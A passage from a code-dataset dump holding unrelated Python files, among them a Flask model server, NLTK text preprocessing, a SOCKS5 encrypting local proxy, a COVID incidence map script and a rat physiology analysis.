cast_map:\n grad = float_cast(grad, dtype=cast_map[name])\n\n if grad.dtype.base_dtype is tf.float16:\n group16.append((i, grad, param))\n else:\n group32.append((i, grad, param))\n break\n\n for name, group16, group32 in groups:\n count = 0\n for group in (group16, group32):\n count += len(group)\n if len(group) > 0:\n if len(group) == 1:\n concated = group[0][1]\n else:\n concated = tf.concat([tf.reshape(grad, [-1]) for _, grad, _ in group], 0, name=\"concat_\"+name)\n\n reduced = allreduce(concated, num_comms=num_comms, prereduce=prereduce)\n\n if len(group) == 1:\n grads[group[0][0]] = reduced\n else:\n offset = 0\n for i, grad, param in group:\n size = param.shape.num_elements()\n grads[i] = tf.reshape(reduced[offset: offset + size], param.shape)\n offset += size\n\n if count == 0:\n print(\"Warning: no grads found for all_reduce group: \", name)\n\n # nothing to return, grads modified in place\n\ndef sync_variables_op(mpi_rank, num_comms=2, prereduce=0):\n ops = list()\n prev = []\n with tf.device(\"/gpu:0\"):\n for var in tf.trainable_variables():\n with tf.control_dependencies(prev):\n op = tf.assign(var, allreduce(var if mpi_rank == 0 else var * 0.0, num_comms=num_comms, prereduce=prereduce))\n prev = [op]\n ops.append(op)\n\n return tf.group(*ops)\n\n\n","sub_path":"blocksparse/nccl.py","file_name":"nccl.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"517066129","text":"#!/usr/bin/env python2.7\n# coding: utf-8\nimport numpy as np\nfrom flask import Flask, request, jsonify\n# import pickle\nfrom joblib import dump, load\n\napp = Flask(__name__)\nmodel = load(open('model.joblib','rb'))\n\n@app.route('/api',methods=['POST'])\ndef predict():\n data = request.get_json(force=True)\n prediction = model.predict([np.array(data['features'])])\n output = prediction[0]\n return jsonify(output)\n\nif __name__ == '__main__':\n app.run(port=5000, debug=True)","sub_path":"KNNServer.py","file_name":"KNNServer.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"147061104","text":"import argparse\nimport logging\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--loglevel', default='WARNING')\n# parser.add_argument('--loglevel', choices=['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'], default='WARNING')\nargs = parser.parse_args()\n\nnumeric_level = getattr(logging, args.loglevel.upper(), None)\nif not isinstance(numeric_level, int):\n raise ValueError(f'Invalid log level: {args.loglevel}')\nlogging.basicConfig(level=numeric_level)\n\nlogging.debug('debug log')\nlogging.info('info log')\nlogging.warning('warning log')\nlogging.error('error log')\n","sub_path":"ex3_level_cmd.py","file_name":"ex3_level_cmd.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"372812907","text":"# @author jiangshiyi\n# @python 3.6.4\n#\n#\n# @time 2018.10.1\nfrom pathlib import Path\nimport csv\nimport re\n\n\nbase_dir = Path(__file__).cwd()\ndata = base_dir.joinpath(\"data\")\n\ndef print_infos(infos,item):\n \"\"\"\n infos: 一个字符串,表示要打印的 fields\n item : 一个有序字典\n 更与信息打印出 结果\n \"\"\"\n if infos == \"*\":\n for i in item:\n print(i + \":\" + item[i],end=\" \")\n print(\"\")\n else:\n parms = infos.split(\",\")\n for parm in parms:\n print(parm + \":\" + item[parm],end=\" \")\n print(\"\")\n\ndef check_item_condition(item,condition):\n \"\"\"\n item : 一个有序字典\n condition : 字符串条件\n 用于核查一个 item 是否符合该条件\n \"\"\"\n is_between_and = re.compile(r\"(\\w+) between (\\w+) and (\\w+)\",re.IGNORECASE).match(condition)\n # id = 1\n is_single_condition = re.compile(r\"([\\w\\s]+)([=<>]+)([\\w\\s]+)\",re.IGNORECASE).match(condition)\n\n if is_between_and:\n parm = is_between_and.group(1)\n begin = int(is_between_and.group(2))\n end = int(is_between_and.group(3))\n \n if parm not in item.keys():\n print(\"Error parm!\")\n return False\n \n if int(item[parm]) <= end and int(item[parm]) > begin:\n return True\n else:\n return False\n \n if is_single_condition:\n left = is_single_condition.group(1).strip()\n right = is_single_condition.group(3).strip()\n operator = is_single_condition.group(2).strip()\n \n if left not in item.keys():\n print(\"Error parm!\")\n return False\n \n if operator == \"=\" and item[left] == right:\n return True\n elif operator == \">\" and item[left] > right:\n return True\n elif operator == \"<\" and item[left] < right:\n return True\n elif operator == \">=\" and item[left] >= right:\n return True\n elif operator == \"<=\" and item[left] <= right:\n return True\n else:\n return False\n","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"421758230","text":"import fitz\n\ndoc = fitz.open(\"documents/addavichi.pdf\")\n\nfor x in range(len(doc)):\n for img in doc.getPageImageList(x):\n xref = img[0]\n pix = fitz.Pixmap(doc, xref)\n if pix.n < 5:\n pix.writePNG(\"p%s-%s.png\" % (x, xref))\n else:\n pix1 = fitz.Pixmap(fitz.csRGB, pix)\n pix1.writePNG(\"p%s-%s.png\" % (x, xref))\n pix1 = None\n pix = None","sub_path":"algorithm/testing/imageconvert.py","file_name":"imageconvert.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"479873936","text":"import json\nfrom datetime import datetime\n\nimport contextily as ctx\nimport geopandas as gpd\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nmap_zip = \"zip://./src/Salzburg.zip!Salzburg_BEV_VGD_250_LAM.shp\"\nreport_dir = \"./docs/report/\"\n\n\ndef main():\n # get Up to date covid Data\n raw_data = pd.read_csv(report_dir + 'aktiv.csv').set_index('Gemeinde')\n last_updated = datetime.strptime(raw_data.columns[-1], \"%Y-%m-%dT%H:%M:%S.%fZ\")\n # rename last column\n covid_data = pd.DataFrame()\n covid_data['sevenDaysMean'] = raw_data.iloc[:, -7:].mean(axis=1)\n covid_data['sevenDaysMeanYesterday'] = raw_data.iloc[:, -8:-1].mean(axis=1)\n covid_data['sevenDaysMeanChange'] = covid_data['sevenDaysMean'] - covid_data['sevenDaysMeanYesterday']\n\n # add deaths\n death_data = pd.read_csv(report_dir + 'verstorben.csv').set_index('Gemeinde')\n covid_data['Verstorben'] = death_data.iloc[:, -1:]\n\n # get Population for relative numbers\n with open(report_dir + \"population.json\") as population_file:\n population = json.load(population_file)\n population = pd.DataFrame(population, index=[\"population\"])\n\n # some fixes of uncategorized population\n population['Flachgau - Nicht zugeordnet'] = population['Flachgau']\n population['Tennengau - Nicht zugeordnet'] = population['Tennengau']\n population['Pongau - Nicht zugeordnet'] = population['Pongau']\n population['Pinzgau - Nicht zugeordnet'] = population['Pinzgau']\n population['Lungau - Nicht zugeordnet'] = population['Lungau']\n population['Stadt Salzburg - Nicht zugeordnet'] = population['Salzburg Stadt']\n\n covid_data = covid_data.join(population.transpose())\n covid_data['population'] = covid_data['population'].fillna(0).astype(int)\n\n covid_data['relativeActive'] = covid_data['sevenDaysMean'] / covid_data['population'] * 100000\n covid_data['relativeActiveYesterday'] = covid_data['sevenDaysMeanYesterday'] / covid_data['population'] * 100000\n covid_data['relativeActiveChange'] = covid_data['relativeActive'] - covid_data['relativeActiveYesterday']\n\n covid_data['active'] = raw_data.iloc[:, -1:]\n covid_data['activeYesterday'] = raw_data.iloc[:, -2:-1]\n covid_data['activeChange'] = covid_data['active'] - covid_data['activeYesterday']\n\n # some fixes of city names\n covid_data.rename(inplace=True, index={\n 'Salzburg Stadt': 'Salzburg',\n 'Bruck an der Glocknerstraße': 'Bruck an der Großglocknerstraße',\n 'Fusch an der Glocknerstraße': 'Fusch an der Großglocknerstraße',\n 'Sankt Martin im Tennengebirge': 'Sankt Martin am Tennengebirge',\n 'Hollersbach': 'Hollersbach im Pinzgau',\n 'Rußbach am Pass Gschütt': 'Rußbach am Paß Gschütt'\n })\n\n create_table(covid_data)\n plot_map(covid_data, last_updated)\n\n\ndef drop_gaue(data):\n data.drop(data.index[data.index.str.endswith('- Nicht zugeordnet', na=False)], inplace=True)\n\n return data.drop([\n 'Flachgau',\n 'Tennengau',\n 'Pongau',\n 'Pinzgau',\n 'Lungau',\n ]).sort_index()\n\n\ndef color_red_green(val):\n \"\"\"\n Takes a scalar and returns a string with\n the css property `'color: red'` for negative\n strings, black 0 and green for positives.\n \"\"\"\n color = '#5fba7d' if val > 0 else 'black' if val == 0 else '#d65f5f'\n\n return 'color: %s' % color\n\n\ndef create_table(data):\n table = drop_gaue(data)[['relativeActive', 'active', 'activeChange', 'Verstorben', 'population']]\n\n table.rename(inplace=True, columns={\n 'relativeActive': '7-Tage-Inzidenz',\n 'active': 'Aktive Fälle',\n 'activeChange': 'Δ aktive Fälle',\n 'population': 'Bevölkerung',\n })\n\n html = table.style \\\n .applymap(color_red_green, subset=table.columns[2]) \\\n .bar(subset=table.columns[0], align='mid', color='#5fba7d') \\\n .bar(subset=table.columns[2], align='zero', color=['#d65f5f', '#5fba7d']) \\\n .bar(subset=table.columns[3], align='zero', color='#4d4d4d') \\\n .set_precision(2) \\\n .set_uuid('') \\\n .render()\n\n with open(report_dir + \"table.html\", 'w') as f:\n f.write(html)\n\n\ndef plot_map(data, last_updated):\n # get map\n salzburg = gpd.read_file(map_zip)\n # simplify districts\n salzburg = salzburg.dissolve(by='PG')\n\n plot_data = salzburg.join(data)[['relativeActive', 'geometry']].to_crs(epsg=3857)\n\n ax = plot_data.plot(\n column='relativeActive',\n cmap='Paired',\n figsize=(14, 10.5),\n legend=True,\n legend_kwds={'shrink': 0.8, 'alpha': 0.5},\n alpha=0.5,\n edgecolor='k',\n )\n ctx.add_basemap(ax, source=ctx.providers.Stamen.TonerLite)\n plt.axis('off')\n plt.title('7-Tages-Mittel pro 100.000 Einwohner', fontsize=20)\n plt.suptitle('zivilschutz.at\\nStand: ' + last_updated.strftime('%d.%m.%Y %H:%m'), y=0.95)\n plt.savefig(report_dir + \"aktiv.png\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":4946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"591623881","text":"for T in range(int(input())):\n v, e = list(map(int, input().split()))\n ls_e = []\n for i in range(e):\n ls_e.append(list(map(int, input().split())))\n ls_e = sorted(ls_e,key=lambda x:x[0])\n s, g = list(map(int, input().split()))\n visit = [0]*(len(ls_e)+1)\n nt_ls = [[] for i in range(v+1)]\n stack = []\n print(visit)\n for i in ls_e:\n nt_ls[i[0]] += [i[1]]\n print(nt_ls)\n stack.append(s)\n rs = 0\n while stack :\n chk = stack.pop()\n stack.extend(nt_ls[chk])\n if g in stack:\n rs = 1\n break\n print(f'#{T+1} ',end='')\n print(rs)","sub_path":"Solving_Problem/과제 스크립/4일차 - 그래프 경로.py","file_name":"4일차 - 그래프 경로.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"134812129","text":"#!/usr/bin/env python\n\n# Copyright (c) 2012 clowwindy\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport sys\n\n\n\nimport select\nimport socketserver\nimport struct\nimport os\nimport json\nimport socket\nimport logging\nimport traceback\n\nfrom secretkeeper import SecretKeeper\n\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)-8s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S', filemode='a+')\n\n\nclass LocalProxyServer(socketserver.ThreadingMixIn, socketserver.TCPServer): # Multiple inheritance\n allow_reuse_address = False\n\n\nclass LocalProxyServerHandler(socketserver.StreamRequestHandler):\n\n\n def handle_udp_datagram(self,sock,local_udp,remote,cipher):\n try:\n logging.debug(\"Enter udp loop\")\n fdset = [sock, local_udp, remote]\n while True:\n r, w, e = select.select(fdset, [], [],1) # use select I/O multiplexing model\n\n if sock in r: # if local socket is ready for reading\n data = sock.recv(4096)\n #logging.debug(\"Sock Recv %d\" %len(data))\n if len(data) <= 0: # received all data\n break\n\n if local_udp in r:\n data, address = local_udp.recvfrom(4096)\n\n\n if remote in r: # remote socket(proxy) ready for reading\n data = remote.recv(4096)\n\n\n finally:\n try:\n logging.info(\"shutdown local tcp socket:%d:%d, local udp socket:%d:%d ,and remote socket:%d:%d\"%(sock.getsockname()[0],sock.getsockname()[1],local_udp.getsockname()[0],local_udp.getsockname()[1],remote.getsockname()[0],remote.getsockname()[1]))\n sock.shutdown(socket.SHUT_RDWR)\n remote.shutdown(socket.SHUT_RDWR)\n except:\n pass\n\n\n\n ''' RequesHandlerClass Definition '''\n def handle_tcp_stream(self, sock, remote,cipher):\n try:\n fdset = [sock, remote]\n while True:\n r, w, e = select.select(fdset, [], []) # use select I/O multiplexing model\n if sock in r: # if local socket is ready for reading\n data = sock.recv(4096)\n #logging.debug(\"Sock Recv %d\" %len(data))\n if len(data) <= 0: # received all data\n break\n data = cipher.encrypt(data)\n result = remote.sendall(data) # send data after encrypting\n\n if remote in r: # remote socket(proxy) ready for reading\n data = remote.recv(4096)\n #logging.debug(\"Remote Recv %d\" %len(data))\n if len(data) <= 0:\n break\n data = cipher.decrypt(data)\n result = sock.sendall( (data)) # send to local socket(application)\n finally:\n try:\n logging.info(\"shutdown local socket:%d:%d and remote socket:%d:%d\"%(sock.getsockname()[0],sock.getsockname()[1],remote.getsockname()[0],remote.getsockname()[1]))\n sock.shutdown(socket.SHUT_RDWR)\n remote.shutdown(socket.SHUT_RDWR)\n except:\n pass\n\n\n def connect_to_remote(self):\n logging.debug(\"Connecting remote proxy server %s %d\"%(SERVER, REMOTE_PORT))\n remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n #remote.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) # turn off Nagling\n remote.connect((SERVER, REMOTE_PORT))\n logging.debug(\"Remote proxy server connected\")\n return remote\n\n\n def parse_socks_header(self,rfile):\n data = rfile.read(4) # Forward request format: VER CMD RSV ATYP (4 bytes)\n mode = ord(data[1:2]) # CMD == 0x01 (connect)\n if mode != 1 and mode !=3:\n logging.warning('Unsupported mode!')\n return\n addrtype = ord(data[3:4]) # indicate destination address type\n header_to_send = data[1:2]+data[3:4]\n if addrtype == 1: # IPv4\n addr_ip = rfile.read(4) # 4 bytes IPv4 address (big endian)\n addr = socket.inet_ntoa(addr_ip)\n header_to_send += addr_ip\n elif addrtype == 3: # FQDN (Fully Qualified Domain Name)\n addr_len = (rfile.read(1)) # Domain name's Length\n if(ord(addr_len)>64):\n logging.warning('invaild address length!')\n return\n addr = rfile.read(ord(addr_len)) # Followed by domain name(e.g. www.google.com)\n header_to_send += addr_len + addr\n else:\n logging.warning('addr_type not support')\n return\n addr_port = rfile.read(2)\n header_to_send += addr_port # addr_to_send = ATYP + [Length] + dst addr/domain name + port\n port = struct.unpack('>H', addr_port)\n logging.info('%s-connecting %s:%d' % ('tcp' if mode==1 else 'udp',addr, port[0]))\n return mode,header_to_send\n\n def pack_header(self,socksheader,cipher,iv):\n socksheader = b'sock' + socksheader\n socksheader = socksheader + b'0'*(96-len(socksheader))\n socksheader = cipher.encrypt(socksheader,False)\n packet = b'GET / HTTP/1.1\\r\\n'+iv+socksheader\n return packet\n\n def handle(self):\n try:\n remote = self.connect_to_remote()\n sock = self.connection # local socket [127.1:port]\n sock.recv(512) # Sock5 Verification packet\n sock.send(b\"\\x05\\x00\") # Sock5 Response: '0x05' Version 5; '0x00' NO AUTHENTICATION REQUIRED\n mode, socksheader = self.parse_socks_header(self.rfile)\n if socksheader != None:\n iv = SecretKeeper.generate_iv()\n cipher = SecretKeeper.getCipher(KEY,iv)\n if mode == 1: #TCP Implementation\n reply = b\"\\x05\\x00\\x00\\x01\" # VER REP RSV ATYP\n reply += socket.inet_aton('0.0.0.0') + struct.pack(\">H\", 62222) # listening on 2222 on all addresses of the machine, including the loopback(127.0.0.1)\n self.wfile.write(reply) # response packet\n packet = self.pack_header(socksheader,cipher,iv)\n remote.sendall(packet)\n self.handle_tcp_stream(sock, remote,cipher)\n elif mode == 3: #UDP Implementation\n local_udp = socket.socket( socket.AF_INET, socket.SOCK_DGRAM ) # Create an udp socket\n local_udp.bind( ('', 0) ) # Local udp socket\n reply = b\"\\x05\\x00\\x00\\x01\" # VER REP RSV ATYP\n reply += socket.inet_aton('127.0.0.1') + struct.pack(\">H\", local_udp.getsockname()[1]) # listening on 2222 on all addresses of the machine, including the loopback(127.0.0.1)\n self.wfile.write(reply) # response packet\n packet = self.pack_header(socksheader,cipher,iv)\n remote.sendall(packet)\n self.handle_udp_datagram(sock,local_udp,remote,cipher)\n except Exception as e:\n traceback.print_exc()\n logging.warning(e)\n\n\nif __name__ == '__main__':\n logging.info(\"Tinysocks 0.1b\")\n os.chdir(os.path.dirname(__file__) or '.')\n\n with open('config.json', 'r') as f:\n config = json.load(f)\n SERVER = config['server']\n REMOTE_PORT = config['remote_port']\n PORT = config['local_port']\n PASSWORD = config['password']\n SecretKeeper.init_secret_keeper()\n KEY= SecretKeeper.generate_key(PASSWORD)\n server = LocalProxyServer(('', PORT), LocalProxyServerHandler) # s.bind(('', 80)) specifies that the socket is reachable by any address the machine happens to have.\n logging.info(\"starting server at port %d ...\" % PORT)\n server.serve_forever()\n\n","sub_path":"local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":9142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"243566958","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport unittest\nfrom pytest import raises\nfrom tweet_process.util import reading_config\nfrom tweet_process.job_tweet import JobTweet\nfrom tweet_process.domain_extractor import TweetDomainExtractor\n\n\nclass TweetDomainExtractorTestCase(unittest.TestCase):\n\n def setUp(self):\n config = reading_config()\n self.domain_extractor = TweetDomainExtractor(config)\n self.job_tweet = JobTweet(\n job_id=82567,\n landing_url=\"https://jobs.cvshealth.com/job/-/-/5770/1831139\")\n\n def test_process_return(self):\n res = self.domain_extractor.process(self.job_tweet)\n self.assertTrue(res)\n\n def test_process_result(self):\n self.domain_extractor.process(self.job_tweet)\n domain = \"cvshealth.com\"\n self.assertEqual(self.job_tweet.domain, domain)\n\n def test_process_attr_error(self):\n with raises(AttributeError):\n self.job_tweet.domain\n\n\n# vim: ts=4 sw=4 sts=4 expandtab\n","sub_path":"tests/test_domain_extractor.py","file_name":"test_domain_extractor.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"550246430","text":"class DomesticAnimals:\n weight = 10 # kg\n height = 50 # cm\n favorite_food = None\n animal_name = None\n animal_group = None\n\n def __init__(self, animal_group, animal_name, favorite_food, height, weight):\n self.animal_group = animal_group\n self.animal_name = animal_name\n self.favorite_food = favorite_food\n self.height = height\n self.weight = weight\n\n def eat(self, value):\n self.weight += value\n\n\nclass LargeAnimal(DomesticAnimals):\n def give_meat(self):\n print(\"You have meat\", self.animal_group, \" - \", self.weight, \" kg\")\n self.weight = 0\n\n\nclass BirdAnimal(DomesticAnimals):\n def give_feather(self):\n print(\"You have feather\", self.animal_group)\n self.weight -= 1\n\n\nx1 = LargeAnimal(\"cows\", \"Буренка\", \"Сено\", 100, 500)\n# print(x1.weight)\nx1.give_meat()\n# print(x1.weight)\n\nx2 = LargeAnimal(\"goats\", \"Буренка\", \"Сено\", 100, 500)\nprint(x2.animal_group)\nx2.animal_group = \"cows\"\nprint(x2.animal_group)\n\ny1 = BirdAnimal(\"duck\", \"ГуГу\", \"трава\", 40, 20)\n# print(y1.weight)\ny1.give_feather()\n# print(y1.weight)\n","sub_path":"text_prog.py","file_name":"text_prog.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"290657568","text":"from setuptools import setup, Extension\n\nglver = Extension(\n\t'glver.glver',\n\tlibraries = ['User32'],\n\tsources = ['source/glver.cpp']\n) \n\nsetup(\n\tname = 'glver',\n\tversion = '1.0.0',\n\tdescription = 'Python: Determine OpenGL version.',\n\tauthor = 'Szabolcs Dombi',\n\tauthor_email = 'cprogrammer1994@gmail.com',\n\turl = 'https://github.com/cprogrammer1994/glver',\n\text_modules = [glver],\n\tpackages = ['glver'],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"49011557","text":"from typing import List\nfrom copy import copy\n\n\nclass Solution:\n def canThreePartsEqualSum(self, A: List[int]) -> bool:\n # n = len(A)\n # s1, s2 = copy(A), copy(A)\n # i, j = 1, n - 2\n # while i < n and j > -1:\n # s1[i] += s1[i - 1]\n # s2[j] += s2[j + 1]\n # i, j = i + 1, j - 1\n #\n # _sum = s2[0]\n # if _sum % 3 != 0:\n # return False\n # tmp = _sum // 3\n #\n # for p in range(n):\n # if s1[p] == tmp:\n # for q in range(n - 1, p, -1):\n # if s2[q] == s1[p]:\n # return True\n # return False\n\n sum_all = sum(A)\n if sum_all % 3 != 0:\n return False\n div = sum_all // 3\n\n tmp, cnt = 0, 0\n for x in A:\n tmp += x\n if tmp == div:\n tmp, cnt = 0, cnt + 1\n return cnt == 3\n\n\ndef test_solution():\n assert Solution().canThreePartsEqualSum([0, 2, 1, -6, 6, -7, 9, 1, 2, 0, 1])\n assert not Solution().canThreePartsEqualSum([0, 2, 1, -6, 6, 7, 9, -1, 2, 0, 1])\n assert Solution().canThreePartsEqualSum([3, 3, 6, 5, -2, 2, 5, 1, -9, 4])\n","sub_path":"leetcode_1013/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"233949754","text":"import nltk, re #operator, pprint\nfrom nltk import word_tokenize\nfrom nltk.corpus import stopwords\n# from os import listdir\n# from os.path import isfile, isdir, join\nimport numpy\nimport sys, csv, codecs# getopt, codecs, tim/e, os, csv\nfrom collections import Counter\n\n\nchars = ['{','}','#','%','&','\\(','\\)','\\[','\\]','<','>',',', '!', '.', ';', \n'?', '*', '\\\\', '\\/', '~', '_','|','=','+','^',':','\\\"','\\'','@','-']\n\ndef stem(word):\n regexp = r'^(.*?)(ing|ly|ed|ious|ies|ive|es|s|ment)?$'\n stem, suffix = re.findall(regexp, word)[0]\n return stem\n\ndef read_bagofwords_dat(myfile):\n bagofwords = numpy.genfromtxt('myfile.csv',delimiter=',')\n return bagofwords\n\ndef find_bigrams(input_list):\n return [a + b for (a,b) in zip(input_list, input_list[1:])]\n\ndef tokenize_corpus(train=True):\n porter = nltk.PorterStemmer() # also lancaster stemmer\n wnl = nltk.WordNetLemmatizer()\n stopWords = stopwords.words(\"english\")\n docs = []\n classes = []\n positive_words = Counter()\n negative_words = Counter()\n\n for line in sys.stdin:\n theclass = line.rsplit()[-1]\n raw = line.decode('latin1')\n raw = ' '.join(raw.rsplit()[1:-1])\n # remove noisy characters; tokenize\n raw = re.sub('[%s]' % ''.join(chars), ' ', raw)\n tokens = word_tokenize(raw)\n tokens = [w.lower() for w in tokens]\n tokens = [w for w in tokens if w not in stopWords]\n tokens = [wnl.lemmatize(t) for t in tokens]\n tokens = [porter.stem(t) for t in tokens] \n tokens = Counter(tokens + find_bigrams(tokens))\n docs.append(tokens)\n if int(theclass) == 1: positive_words += tokens \n else: negative_words += tokens \n classes.append(theclass)\n return docs, classes, positive_words, negative_words\n\ndef find_wordcounts(docs, vocab):\n bagofwords = numpy.zeros(shape=(len(docs),len(vocab)), dtype=numpy.uint8)\n vocabIndex={}\n for i in range(len(vocab)):\n vocabIndex[vocab[i]]=i\n\n for i in range(len(docs)):\n doc = docs[i]\n\n for t in doc:\n index_t=vocabIndex.get(t)\n if index_t>=0:\n bagofwords[i,index_t]=bagofwords[i,index_t]+1\n\n # print \"Finished find_wordcounts for:\", len(docs), \"docs\"\n return(bagofwords)\n\ndocs, classes, positive_words, negative_words = tokenize_corpus()\n\nvocabfile = open('vocab.txt', 'r')\nvocab = [line.rstrip('\\n') for line in vocabfile]\nvocabfile.close()\n\noutfile= open('data/test_classes.txt', 'w')\noutfile.write(\"\\n\".join(classes))\noutfile.close()\n\nwith open(\"data/bow_test.csv\", \"wb\") as f:\n writer = csv.writer(f)\n writer.writerows(find_wordcounts(docs, vocab))\noutfile = open(\"test_classes.txt\", 'w')","sub_path":"preptest.py","file_name":"preptest.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"552331164","text":"# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nLoads the first dataset and performs the first method.\r\n\r\nsql_connection module is needed to import data.\r\n\"\"\"\r\n\r\nfrom sql_connection import engine as engine # This module is not included in repo, to keep data private.\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.metrics import classification_report, confusion_matrix\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.model_selection import GridSearchCV\r\n#from matplotlib import colors\r\n\r\n# Loads a dataframe used to map the rat strain to rat ID.\r\nstrain_map = pd.read_sql(\r\n \"SELECT `id`, `strain` FROM `ratExperiment`\",\r\n con=engine\r\n )\r\n\r\n# Define a dictionary that maps rat strains to a colour. The color is kept consistent throughot the whole work.\r\ncolors_map = {'SHR': '#F5793A', 'WT': '#A95AA1', 'HanSD': '#0F2080', 'TGR': '#85C0F9'}\r\n\r\n# Define dictionary encoder. Most of the methods encode strings automaticaly, but there are exeptions.\r\nencoder = {'SHR': '0', 'WT': '1', 'HanSD': '2', 'TGR': '3'}\r\n\r\n# Names of the fields of the dataframe. Used for properly labeling axes and names of the plots.\r\ncolumn_title = {'pulsePressure': 'Pulse Pressure (mmHg)',\r\n 'diastolicBP': 'Diastolic BP (mmHg)',\r\n 'meanBP': 'Blood Pressure (mmHg)',\r\n 'systolicBP': 'Systolic BP (mmHg)',\r\n 'heartRate': 'Heart Rate (BPM)',\r\n 'activity': 'Activity (Movement Per Minute)'}\r\n\r\n\r\ndef main():\r\n \"\"\"Wrap the main process separate.\"\"\"\r\n from control_select import control_df\r\n\r\n def plot_day_night_scatter(column_name, rats_avgs):\r\n \"\"\"\r\n Create a scatter plot with dark phase averages on X axis and light phase averages on the Y axis.\r\n\r\n Parameters\r\n ----------\r\n column_name : string\r\n Selct which column to plot.\r\n rats_avgs : pandas.dataframe\r\n Dataframe of aggregate data.\r\n\r\n\r\n \"\"\"\r\n plt.figure()\r\n rats_avgs = rats_avgs.join(strain_map.set_index('id'))\r\n plt.scatter(column_name + 'dark',\r\n column_name + 'light',\r\n data=rats_avgs,\r\n c=rats_avgs['strain'].map(colors_map))\r\n plt.title(column_title[column_name])\r\n plt.xlabel('Dark Phase')\r\n plt.ylabel('Light Phase')\r\n plt.show()\r\n plt.savefig('rats_avgs_' + str(column_name) + '.png',\r\n dpi=300,\r\n transparent=True)\r\n\r\n def calc_avg_one_column(column_name, kresli=True):\r\n \"\"\"\r\n Calculate averages separate for light and dark phase.\r\n\r\n Parameters\r\n ----------\r\n column_name : string\r\n Selct which column to use.\r\n kresli : boolean, optional\r\n If the scatter plot of that column should be plotted. The default is True.\r\n\r\n Returns\r\n -------\r\n rats_avgs : pandas.dataframe\r\n calculated average values per rat.\r\n\r\n \"\"\"\r\n pomocna = control_df[['idRatExperiment', column_name, 'lightIntensity']]\r\n pivot_rats = pomocna.groupby(['idRatExperiment', 'lightIntensity']).mean()\r\n pivot_rats = pivot_rats.reset_index(level=[0, 1])\r\n X = pivot_rats[['idRatExperiment', column_name]][pivot_rats.lightIntensity == 0]\r\n Y = pivot_rats[['idRatExperiment', column_name]][pivot_rats.lightIntensity == 150]\r\n rats_avgs = X.set_index('idRatExperiment').join(Y.set_index('idRatExperiment'), lsuffix='dark', rsuffix='light')\r\n\r\n if kresli:\r\n plot_day_night_scatter(column_name, rats_avgs)\r\n\r\n return rats_avgs\r\n\r\n def calc_avg_one_column_multiple(kresli=True, *args):\r\n \"\"\"\r\n Call calc_avg_one_column() function on multiple columns.\r\n\r\n Parameters\r\n ----------\r\n kresli : boolean, optional\r\n If the scatter plots of that columns should be plotted. The default is True.\r\n *args : string\r\n Names of the columns requested.\r\n\r\n Returns\r\n -------\r\n x : pandas.dataframe\r\n Rats with the corresponding average values. All the needed features are now prepared.\r\n\r\n \"\"\"\r\n iterargs = iter(args) # Goes through the multipe arguments (column 